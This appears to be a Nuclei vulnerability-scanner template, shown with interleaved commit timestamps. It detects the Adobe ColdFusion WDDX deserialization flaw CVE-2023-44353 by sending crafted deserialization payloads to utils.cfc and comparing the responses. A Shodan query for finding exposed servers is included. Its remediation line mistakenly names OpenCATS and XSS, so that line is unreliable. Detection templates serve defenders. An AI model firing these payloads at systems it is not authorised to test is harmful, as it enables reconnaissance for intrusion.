2023-11-22 16:48:59 +00:00
id : CVE-2023-44353
info :
2024-01-06 20:24:38 +00:00
name : Adobe ColdFusion WDDX Deserialization Gadgets
2023-11-22 16:48:59 +00:00
author : salts
severity : critical
description : |
2024-01-06 20:24:38 +00:00
Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by an Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.
remediation : |
To mitigate this vulnerability, it is recommended to apply the latest security patches or upgrade to a newer version of OpenCATS that addresses the XSS vulnerability.
2023-11-22 16:48:59 +00:00
reference :
2024-01-06 20:24:38 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2023-44353
- https://helpx.adobe.com/security/products/coldfusion/apsb23-52.html
2023-11-22 16:48:59 +00:00
- https://research.nccgroup.com/2023/11/21/technical-advisory-adobe-coldfusion-wddx-deserialization-gadgets/#coldfusion-wddx.py
2024-01-06 20:24:38 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2023-11-22 16:48:59 +00:00
cvss-score : 9.8
2024-01-06 20:24:38 +00:00
cve-id : CVE-2023-44353
cwe-id : CWE-502
epss-score : 0.00227
epss-percentile : 0.60906
cpe : cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:*
metadata :
verified : true
max-request : 4
vendor : adobe
product : coldfusion
shodan-query : http.component:"Adobe ColdFusion"
2024-01-08 07:13:17 +00:00
tags : cve,cve2023,adobe,coldfusion,deserialization
2023-11-22 16:48:59 +00:00
variables :
windows_known_path : "C:\\Windows\\"
windows_bad_path : "C:\\Thisdefinitelydoesnotexist\\"
2024-01-06 20:27:54 +00:00
linux_known_path : "/etc/"
2023-11-22 16:48:59 +00:00
linux_bad_path : "/thesecretcowlevelisreal/"
2024-01-06 20:24:38 +00:00
2023-11-22 16:48:59 +00:00
http :
- raw :
- |
2024-01-08 07:13:17 +00:00
POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1
2024-01-06 20:27:54 +00:00
Host : {{Hostname}}
2023-11-22 16:48:59 +00:00
Content-Type : application/x-www-form-urlencoded
2024-01-06 20:30:12 +00:00
2024-01-06 20:24:38 +00:00
argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{windows_known_path}}</string></var></struct></data></wddxPacket>
2023-11-22 16:48:59 +00:00
- |
2024-01-08 07:13:17 +00:00
POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1
2024-01-06 20:27:54 +00:00
Host : {{Hostname}}
2023-11-22 16:48:59 +00:00
Content-Type : application/x-www-form-urlencoded
2024-01-06 20:30:12 +00:00
2024-01-06 20:24:38 +00:00
argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{windows_bad_path}}</string></var></struct></data></wddxPacket>
2023-11-22 16:48:59 +00:00
- |
2024-01-08 07:13:17 +00:00
POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1
2024-01-06 20:27:54 +00:00
Host : {{Hostname}}
2023-11-22 16:48:59 +00:00
Content-Type : application/x-www-form-urlencoded
2024-01-06 20:24:38 +00:00
argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{linux_known_path}}</string></var></struct></data></wddxPacket>
2023-11-22 16:48:59 +00:00
- |
2024-01-08 07:13:17 +00:00
POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1
2024-01-06 20:27:54 +00:00
Host : {{Hostname}}
2023-11-22 16:48:59 +00:00
Content-Type : application/x-www-form-urlencoded
2024-01-06 20:24:38 +00:00
argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{linux_bad_path}}</string></var></struct></data></wddxPacket>
2023-11-22 16:48:59 +00:00
matchers-condition : or
matchers :
- type : dsl
2024-01-06 20:24:38 +00:00
name : windows
2024-01-06 20:27:54 +00:00
dsl :
2024-01-06 20:24:38 +00:00
- "status_code_1 == 500 && status_code_2 == 404"
- contains(body_1, "coldfusion.runtime")
condition : and
2023-11-22 16:48:59 +00:00
- type : dsl
2024-01-06 20:24:38 +00:00
name : linux
2024-01-06 20:27:54 +00:00
dsl :
2024-01-06 20:24:38 +00:00
- "status_code_3 == 500 && status_code_4 == 404"
- contains(body_3, "coldfusion.runtime")
condition : and
2024-01-08 07:25:24 +00:00
# digest: 4a0a00473045022100c8479fb72fbbe43698045618ddde551327889a7086a1f257c83adb66e48cf20502207277ec6dfdc26529ce63b304f3e66de222c5d40327a607752e5c31b26e8a8768:922c64590222798bb761d5b6d8e72950